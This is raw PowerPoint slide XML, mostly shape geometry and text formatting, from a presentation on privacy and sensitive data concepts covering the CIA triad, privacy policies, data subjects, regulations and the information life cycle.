                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Concepts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32276" y="760476"/>
            <a:ext cx="8892540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09545" y="1882292"/>
            <a:ext cx="11581765" cy="22085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268605" marR="5080" indent="-4445">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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The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value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data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information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assets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determined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by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impact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it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has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on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the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organization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when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any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threat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causes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security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concerns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Confidentiality,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Integrity,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and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Availability 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(CIA).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5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Privacy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policies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must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ensure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storage,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processing,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retention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compliant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with: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01061" y="4786121"/>
            <a:ext cx="5503545" cy="1323340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5503545" h="1323339">
                <a:moveTo>
                  <a:pt x="0" y="220472"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4477" y="176030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17321" y="134641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37645" y="97190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64563" y="64563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97190" y="37645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134641" y="17321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176030" y="4477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220471" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5282692" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5327133" y="4477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5368522" y="17321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5405973" y="37645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5438600" y="64563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5465518" y="97190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5485842" y="134641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498686" y="176030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5503164" y="220472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5503164" y="1102360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498686" y="1146801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5485842" y="1188190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5465518" y="1225641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5438600" y="1258268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5405973" y="1285186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5368522" y="1305510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5327133" y="1318354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5282692" y="1322832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220471" y="1322832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176030" y="1318354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134641" y="1305510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97190" y="1285186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64563" y="1258268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37645" y="1225641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17321" y="1188190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4477" y="1146801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1102360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="220472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848482" y="5012207"/>
            <a:ext cx="4658360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95780" marR="5080" indent="-1783714">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Col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ec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7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pers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nal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abou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data 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subjects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370569" y="4786121"/>
            <a:ext cx="5674360" cy="1323340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5674359" h="1323339">
                <a:moveTo>
                  <a:pt x="0" y="220472"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4477" y="176030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17321" y="134641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37645" y="97190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64563" y="64563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97190" y="37645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134641" y="17321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176030" y="4477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220472" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5453380" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5497821" y="4477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5539210" y="17321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5576661" y="37645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5609288" y="64563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5636206" y="97190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5656530" y="134641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669374" y="176030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5673851" y="220472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5673851" y="1102360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669374" y="1146801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5656530" y="1188190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5636206" y="1225641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5609288" y="1258268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5576661" y="1285186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5539210" y="1305510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5497821" y="1318354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5453380" y="1322832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220472" y="1322832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176030" y="1318354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134641" y="1305510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97190" y="1285186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64563" y="1258268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37645" y="1225641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17321" y="1188190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4477" y="1146801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1102360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="220472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583293" y="5251196"/>
            <a:ext cx="329692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Following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regulations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42382" y="6491478"/>
            <a:ext cx="5674360" cy="1321435"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5674359" h="1321434">
                <a:moveTo>
                  <a:pt x="0" y="220218"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4472" y="175824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17299" y="134481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37598" y="97073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64484" y="64484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97073" y="37598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134481" y="17299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175824" y="4472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220217" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5453634" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498027" y="4472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5539370" y="17299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5576778" y="37598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5609367" y="64484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5636253" y="97073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5656552" y="134481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669379" y="175824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5673851" y="220218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5673851" y="1101090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5669379" y="1145483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5656552" y="1186826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5636253" y="1224234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5609367" y="1256823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5576778" y="1283709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5539370" y="1304008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498027" y="1316835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5453634" y="1321308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220217" y="1321308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175824" y="1316835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134481" y="1304008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97073" y="1283709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64484" y="1256823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37598" y="1224234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17299" y="1186826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472" y="1145483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1101090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="220218"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="E3B36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840473" y="6956552"/>
            <a:ext cx="272796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Following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rights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391" y="306451"/>
            <a:ext cx="642874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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Concepts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32276" y="760476"/>
            <a:ext cx="8892540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47442" y="1882292"/>
            <a:ext cx="11960225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8470" marR="5080" indent="-2985770">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Information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life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cycle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management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identifies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steps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help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development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security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and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privacy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model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.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stage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v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lved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thi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e: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43276" y="4691888"/>
            <a:ext cx="1625600" cy="10299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2540">
              <a:lnSpc>
                <a:spcPct val="99800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Data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collecti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 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generation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79637" y="3773601"/>
            <a:ext cx="2896870" cy="2943225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="274002" y="703783"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="237934" y="667334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211493" y="709307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186613" y="751992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163283" y="795337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141516" y="839304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121297" y="883856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102628" y="928928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85521" y="974509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69977" y="1020533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55981" y="1066965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43535" y="1113751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32651" y="1160868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23329" y="1208265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="1255903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9321" y="1303731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4660" y="1351699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549" y="1399781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1447927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1496098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549" y="1544243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4660" y="1592326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9321" y="1640293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="1688122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23329" y="1735759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32651" y="1783156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43535" y="1830273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55981" y="1877060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69977" y="1923491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85521" y="1969516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102628" y="2015096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121297" y="2060168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141516" y="2104720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163283" y="2148687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186613" y="2192032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211493" y="2234717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237934" y="2276678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274002" y="2240229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248666" y="2198674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224866" y="2156460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202603" y="2113623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181889" y="2070201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162699" y="2026246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145034" y="1981809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128917" y="1936902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114338" y="1891588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101282" y="1845906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89776" y="1799894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79794" y="1753590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71348" y="1707032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64439" y="1660283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59067" y="1613357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55232" y="1566316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52920" y="1519186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52158" y="1472006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52920" y="1424838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55232" y="1377708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59067" y="1330667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64439" y="1283741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71348" y="1236992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79794" y="1190434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89776" y="1144130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101282" y="1098118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114338" y="1052436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128917" y="1007122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145034" y="962215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162699" y="917778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181889" y="873823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202603" y="830402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224866" y="787565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248666" y="745350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274002" y="703783"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="1194498" y="2673299"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1146873" y="2661780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100023" y="2648407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053960" y="2633192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008735" y="2616212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964399" y="2597480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920965" y="2577058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878497" y="2554973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837018" y="2531262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796582" y="2505976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757224" y="2479154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718972" y="2450833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681888" y="2421051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645985" y="2389860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611327" y="2357285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577951" y="2323388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545884" y="2288184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515175" y="2251722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485863" y="2214054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457974" y="2175205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431571" y="2135225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406679" y="2094153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383349" y="2052027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361607" y="2008898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341503" y="1964791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323075" y="1919744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306349" y="1873821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291388" y="1827034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278218" y="1779447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266890" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223710" y="1731086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234315" y="1778812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246646" y="1825815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260667" y="1872056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276326" y="1917509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293598" y="1962137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312445" y="2005914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332828" y="2048776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354736" y="2090724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378104" y="2131695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402907" y="2171674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429120" y="2210600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456704" y="2248471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485622" y="2285225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515835" y="2320836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547306" y="2355265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580009" y="2388489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613918" y="2420455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648970" y="2451138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685165" y="2480513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722439" y="2508516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760768" y="2535136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800125" y="2560332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840460" y="2584069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881748" y="2606306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923950" y="2627020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="967041" y="2646159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010983" y="2663698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1055725" y="2679598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101255" y="2693822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147521" y="2706344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="2717114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194498" y="2673299"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896870" h="2943225">
                <a:moveTo>
                  <a:pt x="1194498" y="226898"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1147521" y="237718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101255" y="250278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1055725" y="264566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010983" y="280517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="967041" y="298107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="923950" y="317309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881748" y="338086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840460" y="360400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800125" y="384200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760768" y="409473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722439" y="436181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685165" y="464273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648970" y="493737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613918" y="524522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580009" y="556590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547306" y="589902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515835" y="624446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485622" y="660158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="456704" y="697026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429120" y="735012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402907" y="774065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378104" y="814158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354736" y="855256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332828" y="897318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312445" y="940320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293598" y="984224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276326" y="1028992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260667" y="1074585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246646" y="1120965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234315" y="1168120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223710" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266890" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278218" y="1167472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291388" y="1119720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306349" y="1072794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323075" y="1026718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341503" y="981544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361607" y="937298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383349" y="894029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406679" y="851776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431571" y="810577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457974" y="770470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485863" y="731507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515175" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545884" y="657161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577951" y="621855"/>
                </a:lnTo>
                <a:lnTo>
